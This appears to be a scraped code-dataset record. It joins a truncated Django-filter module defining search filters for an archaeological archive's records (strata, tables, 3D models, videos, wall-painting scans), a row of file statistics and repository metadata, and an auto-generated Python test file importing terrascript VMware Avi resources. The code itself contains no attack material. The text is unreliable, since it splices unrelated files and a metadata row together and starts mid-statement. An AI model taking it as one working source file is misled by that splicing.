label=StratenID._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
stratum_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=StratenID._meta.get_field('stratum_id').help_text,
label=StratenID._meta.get_field('stratum_id').verbose_name
)
stratum_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=StratenID._meta.get_field('stratum_title').help_text,
label=StratenID._meta.get_field('stratum_title').verbose_name
)
containing_stratum_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="containing_stratum_id"
),
help_text=StratenID._meta.get_field('containing_stratum_id').help_text,
label=StratenID._meta.get_field('containing_stratum_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/containing_stratum_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = StratenID
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'stratum_type',
'site_id',
'stratum_id',
'stratum_title',
'area',
'containing_stratum_id',
]
class TablesListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Tables._meta.get_field('legacy_id').help_text,
label=Tables._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Tables._meta.get_field('fc_name').help_text,
label=Tables._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Tables._meta.get_field('fc_directory').help_text,
label=Tables._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Tables._meta.get_field('fc_type').help_text,
label=Tables._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Tables._meta.get_field('fc_filename').help_text,
label=Tables._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Tables._meta.get_field('fc_extension').help_text,
label=Tables._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Tables._meta.get_field('filename').help_text,
label=Tables._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Tables._meta.get_field('document_id').help_text,
label=Tables._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Tables._meta.get_field('document_title').help_text,
label=Tables._meta.get_field('document_title').verbose_name
)
path_filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Tables._meta.get_field('path_filename_old').help_text,
label=Tables._meta.get_field('path_filename_old').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Tables._meta.get_field('creation_year_original').help_text,
label=Tables._meta.get_field('creation_year_original').verbose_name
)
folder_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Tables._meta.get_field('folder_original').help_text,
label=Tables._meta.get_field('folder_original').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Tables._meta.get_field('original_comment').help_text,
label=Tables._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Tables._meta.get_field('digitisation_comment').help_text,
label=Tables._meta.get_field('digitisation_comment').verbose_name
)
file_extension_original = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_original"
),
help_text=Tables._meta.get_field('file_extension_original').help_text,
label=Tables._meta.get_field('file_extension_original').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_original",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
file_extension_archivalobject = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_archivalobject"
),
help_text=Tables._meta.get_field('file_extension_archivalobject').help_text,
label=Tables._meta.get_field('file_extension_archivalobject').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_archivalobject",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Tables._meta.get_field('copyright').help_text,
label=Tables._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Tables._meta.get_field('access').help_text,
label=Tables._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Tables._meta.get_field('site_id').help_text,
label=Tables._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=Tables._meta.get_field('excavation_post_excavation').help_text,
label=Tables._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Tables
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_archivalobject',
'document_type',
'filename',
'document_id',
'document_title',
'path_filename_old',
'creation_year_original',
'creation_date_archivalobject',
'creation_date_metadata',
'folder_original',
'excavation_object_id',
'archaeological_object_id',
'relatedto',
'original_comment',
'digitisation_comment',
'file_extension_original',
'file_extension_archivalobject',
'copyright',
'access',
'site_id',
'excavation_post_excavation',
]
class ThreeDimensionalModelListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ThreeDimensionalModel._meta.get_field('legacy_id').help_text,
label=ThreeDimensionalModel._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ThreeDimensionalModel._meta.get_field('fc_name').help_text,
label=ThreeDimensionalModel._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ThreeDimensionalModel._meta.get_field('fc_directory').help_text,
label=ThreeDimensionalModel._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ThreeDimensionalModel._meta.get_field('fc_type').help_text,
label=ThreeDimensionalModel._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ThreeDimensionalModel._meta.get_field('fc_filename').help_text,
label=ThreeDimensionalModel._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ThreeDimensionalModel._meta.get_field('fc_extension').help_text,
label=ThreeDimensionalModel._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ThreeDimensionalModel._meta.get_field('filename').help_text,
label=ThreeDimensionalModel._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ThreeDimensionalModel._meta.get_field('document_id').help_text,
label=ThreeDimensionalModel._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ThreeDimensionalModel._meta.get_field('document_title').help_text,
label=ThreeDimensionalModel._meta.get_field('document_title').verbose_name
)
path_filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ThreeDimensionalModel._meta.get_field('path_filename_old').help_text,
label=ThreeDimensionalModel._meta.get_field('path_filename_old').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ThreeDimensionalModel._meta.get_field('creation_year_original').help_text,
label=ThreeDimensionalModel._meta.get_field('creation_year_original').verbose_name
)
software_used = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ThreeDimensionalModel._meta.get_field('software_used').help_text,
label=ThreeDimensionalModel._meta.get_field('software_used').verbose_name
)
relatedto = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ThreeDimensionalModel._meta.get_field('relatedto').help_text,
label=ThreeDimensionalModel._meta.get_field('relatedto').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ThreeDimensionalModel._meta.get_field('original_comment').help_text,
label=ThreeDimensionalModel._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ThreeDimensionalModel._meta.get_field('digitisation_comment').help_text,
label=ThreeDimensionalModel._meta.get_field('digitisation_comment').verbose_name
)
file_extension_original = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_original"
),
help_text=ThreeDimensionalModel._meta.get_field('file_extension_original').help_text,
label=ThreeDimensionalModel._meta.get_field('file_extension_original').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_original",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
file_extension_archivalobject = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_archivalobject"
),
help_text=ThreeDimensionalModel._meta.get_field('file_extension_archivalobject').help_text,
label=ThreeDimensionalModel._meta.get_field('file_extension_archivalobject').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_archivalobject",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=ThreeDimensionalModel._meta.get_field('copyright').help_text,
label=ThreeDimensionalModel._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=ThreeDimensionalModel._meta.get_field('access').help_text,
label=ThreeDimensionalModel._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=ThreeDimensionalModel._meta.get_field('site_id').help_text,
label=ThreeDimensionalModel._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=ThreeDimensionalModel._meta.get_field('excavation_post_excavation').help_text,
label=ThreeDimensionalModel._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = ThreeDimensionalModel
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'filename',
'document_id',
'document_title',
'path_filename_old',
'creator_metadata',
'creation_year_original',
'software_used',
'creation_date_archivalobject',
'creator_original',
'creator_archivalobject',
'creation_date_metadata',
'excavation_object_id',
'archaeological_object_id',
'relatedto',
'original_comment',
'digitisation_comment',
'document_type',
'file_extension_original',
'file_extension_archivalobject',
'copyright',
'access',
'site_id',
'excavation_post_excavation',
]
class VideosListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Videos._meta.get_field('legacy_id').help_text,
label=Videos._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Videos._meta.get_field('fc_name').help_text,
label=Videos._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Videos._meta.get_field('fc_directory').help_text,
label=Videos._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Videos._meta.get_field('fc_type').help_text,
label=Videos._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Videos._meta.get_field('fc_filename').help_text,
label=Videos._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Videos._meta.get_field('fc_extension').help_text,
label=Videos._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Videos._meta.get_field('filename').help_text,
label=Videos._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Videos._meta.get_field('document_id').help_text,
label=Videos._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Videos._meta.get_field('document_title').help_text,
label=Videos._meta.get_field('document_title').verbose_name
)
path_filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Videos._meta.get_field('path_filename_old').help_text,
label=Videos._meta.get_field('path_filename_old').verbose_name
)
path_filename_arche = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Videos._meta.get_field('path_filename_arche').help_text,
label=Videos._meta.get_field('path_filename_arche').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Videos._meta.get_field('original_comment').help_text,
label=Videos._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Videos._meta.get_field('digitisation_comment').help_text,
label=Videos._meta.get_field('digitisation_comment').verbose_name
)
file_extension_original = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_original"
),
help_text=Videos._meta.get_field('file_extension_original').help_text,
label=Videos._meta.get_field('file_extension_original').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_original",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
file_extension_archivalobject = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_archivalobject"
),
help_text=Videos._meta.get_field('file_extension_archivalobject').help_text,
label=Videos._meta.get_field('file_extension_archivalobject').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_archivalobject",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Videos._meta.get_field('copyright').help_text,
label=Videos._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Videos._meta.get_field('access').help_text,
label=Videos._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Videos._meta.get_field('site_id').help_text,
label=Videos._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Videos
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_archivalobject',
'document_type',
'find_inventory_number',
'filename',
'document_id',
'document_title',
'creation_date_original',
'creation_date_archivalobject',
'creation_date_metadata',
'path_filename_old',
'path_filename_arche',
'excavation_object_id',
'archaeological_object_id',
'original_comment',
'digitisation_comment',
'file_extension_original',
'file_extension_archivalobject',
'copyright',
'access',
'site_id',
]
class WallpaintingInventoryListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=WallpaintingInventory._meta.get_field('legacy_id').help_text,
label=WallpaintingInventory._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=WallpaintingInventory._meta.get_field('fc_name').help_text,
label=WallpaintingInventory._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=WallpaintingInventory._meta.get_field('fc_directory').help_text,
label=WallpaintingInventory._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=WallpaintingInventory._meta.get_field('fc_type').help_text,
label=WallpaintingInventory._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=WallpaintingInventory._meta.get_field('fc_filename').help_text,
label=WallpaintingInventory._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=WallpaintingInventory._meta.get_field('fc_extension').help_text,
label=WallpaintingInventory._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=WallpaintingInventory._meta.get_field('filename').help_text,
label=WallpaintingInventory._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=WallpaintingInventory._meta.get_field('document_id').help_text,
label=WallpaintingInventory._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=WallpaintingInventory._meta.get_field('document_title').help_text,
label=WallpaintingInventory._meta.get_field('document_title').verbose_name
)
filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=WallpaintingInventory._meta.get_field('filename_old').help_text,
label=WallpaintingInventory._meta.get_field('filename_old').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=WallpaintingInventory._meta.get_field('creation_year_original').help_text,
label=WallpaintingInventory._meta.get_field('creation_year_original').verbose_name
)
storage_folder_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=WallpaintingInventory._meta.get_field('storage_folder_original').help_text,
label=WallpaintingInventory._meta.get_field('storage_folder_original').verbose_name
)
fresco_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=WallpaintingInventory._meta.get_field('fresco_inventory_number').help_text,
label=WallpaintingInventory._meta.get_field('fresco_inventory_number').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=WallpaintingInventory._meta.get_field('original_comment').help_text,
label=WallpaintingInventory._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=WallpaintingInventory._meta.get_field('digitisation_comment').help_text,
label=WallpaintingInventory._meta.get_field('digitisation_comment').verbose_name
)
file_extension = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension"
),
help_text=WallpaintingInventory._meta.get_field('file_extension').help_text,
label=WallpaintingInventory._meta.get_field('file_extension').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=WallpaintingInventory._meta.get_field('copyright').help_text,
label=WallpaintingInventory._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=WallpaintingInventory._meta.get_field('access').help_text,
label=WallpaintingInventory._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=WallpaintingInventory._meta.get_field('site_id').help_text,
label=WallpaintingInventory._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
equipment_scan = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="equipment_scan"
),
help_text=WallpaintingInventory._meta.get_field('equipment_scan').help_text,
label=WallpaintingInventory._meta.get_field('equipment_scan').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/equipment_scan",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
source_original_copy_edited_copy = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="source_original_copy_edited_copy"
),
help_text=WallpaintingInventory._meta.get_field('source_original_copy_edited_copy').help_text,
label=WallpaintingInventory._meta.get_field('source_original_copy_edited_copy').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/source_original_copy_edited_copy",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
original_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="original_material"
),
help_text=WallpaintingInventory._meta.get_field('original_material').help_text,
label=WallpaintingInventory._meta.get_field('original_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/original_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=WallpaintingInventory._meta.get_field('excavation_post_excavation').help_text,
label=WallpaintingInventory._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = WallpaintingInventory
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_scan',
'document_type',
'filename',
'document_id',
'document_title',
'filename_old',
'creation_date_original',
'creation_year_original',
'creation_date_scan',
'creation_date_metadata',
'storage_folder_original',
'resolution_scan_dpi',
'fresco_inventory_number',
'original_comment',
'digitisation_comment',
'file_extension',
'copyright',
'access',
'site_id',
'equipment_scan',
'source_original_copy_edited_copy',
'original_material',
'excavation_post_excavation',
]
| 41.536777 | 112 | 0.656071 | 24,735 | 254,122 | 6.346028 | 0.009299 | 0.063197 | 0.094796 | 0.079997 | 0.968816 | 0.963993 | 0.947569 | 0.904835 | 0.793781 | 0.746033 | 0 | 0.002584 | 0.240003 | 254,122 | 6,117 | 113 | 41.543567 | 0.810171 | 0.000091 | 0 | 0.579525 | 1 | 0 | 0.218165 | 0.098435 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.000997 | 0 | 0.114675 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
02a453d60b0ce62c9c5447a9ab5869c74748d358 | 14,842 | py | Python | tests/test_provider_vmware_avi.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | tests/test_provider_vmware_avi.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | tests/test_provider_vmware_avi.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # tests/test_provider_vmware_avi.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:12:08 UTC)
def test_provider_import():
import terrascript.provider.vmware.avi
def test_resource_import():
from terrascript.resource.vmware.avi import avi_actiongroupconfig
from terrascript.resource.vmware.avi import avi_albservicesconfig
from terrascript.resource.vmware.avi import avi_albservicesfileupload
from terrascript.resource.vmware.avi import avi_alertconfig
from terrascript.resource.vmware.avi import avi_alertemailconfig
from terrascript.resource.vmware.avi import avi_alertscriptconfig
from terrascript.resource.vmware.avi import avi_alertsyslogconfig
from terrascript.resource.vmware.avi import avi_analyticsprofile
from terrascript.resource.vmware.avi import avi_applicationpersistenceprofile
from terrascript.resource.vmware.avi import avi_applicationprofile
from terrascript.resource.vmware.avi import avi_authprofile
from terrascript.resource.vmware.avi import avi_autoscalelaunchconfig
from terrascript.resource.vmware.avi import avi_availabilityzone
from terrascript.resource.vmware.avi import avi_backup
from terrascript.resource.vmware.avi import avi_backupconfiguration
from terrascript.resource.vmware.avi import avi_botconfigconsolidator
from terrascript.resource.vmware.avi import avi_botdetectionpolicy
from terrascript.resource.vmware.avi import avi_botipreputationtypemapping
from terrascript.resource.vmware.avi import avi_botmapping
from terrascript.resource.vmware.avi import avi_certificatemanagementprofile
from terrascript.resource.vmware.avi import avi_cloud
from terrascript.resource.vmware.avi import avi_cloudconnectoruser
from terrascript.resource.vmware.avi import avi_cloudproperties
from terrascript.resource.vmware.avi import avi_cluster
from terrascript.resource.vmware.avi import avi_clusterclouddetails
from terrascript.resource.vmware.avi import avi_controllerportalregistration
from terrascript.resource.vmware.avi import avi_controllerproperties
from terrascript.resource.vmware.avi import avi_controllersite
from terrascript.resource.vmware.avi import avi_customipamdnsprofile
from terrascript.resource.vmware.avi import avi_dnspolicy
from terrascript.resource.vmware.avi import avi_dynamicdnsrecord
from terrascript.resource.vmware.avi import avi_errorpagebody
from terrascript.resource.vmware.avi import avi_errorpageprofile
from terrascript.resource.vmware.avi import avi_federationcheckpoint
from terrascript.resource.vmware.avi import avi_fileobject
from terrascript.resource.vmware.avi import avi_fileservice
from terrascript.resource.vmware.avi import avi_geodb
from terrascript.resource.vmware.avi import avi_gslb
from terrascript.resource.vmware.avi import avi_gslbgeodbprofile
from terrascript.resource.vmware.avi import avi_gslbservice
from terrascript.resource.vmware.avi import avi_hardwaresecuritymodulegroup
from terrascript.resource.vmware.avi import avi_healthmonitor
from terrascript.resource.vmware.avi import avi_httppolicyset
from terrascript.resource.vmware.avi import avi_icapprofile
from terrascript.resource.vmware.avi import avi_image
from terrascript.resource.vmware.avi import avi_inventoryfaultconfig
from terrascript.resource.vmware.avi import avi_ipaddrgroup
from terrascript.resource.vmware.avi import avi_ipamdnsproviderprofile
from terrascript.resource.vmware.avi import avi_ipreputationdb
from terrascript.resource.vmware.avi import avi_jwtserverprofile
from terrascript.resource.vmware.avi import avi_l4policyset
from terrascript.resource.vmware.avi import avi_labelgroup
from terrascript.resource.vmware.avi import avi_licenseledgerdetails
from terrascript.resource.vmware.avi import avi_memorybalancerrequest
from terrascript.resource.vmware.avi import avi_microservicegroup
from terrascript.resource.vmware.avi import avi_natpolicy
from terrascript.resource.vmware.avi import avi_network
from terrascript.resource.vmware.avi import avi_networkprofile
from terrascript.resource.vmware.avi import avi_networksecuritypolicy
from terrascript.resource.vmware.avi import avi_networkservice
from terrascript.resource.vmware.avi import avi_nsxtsegmentruntime
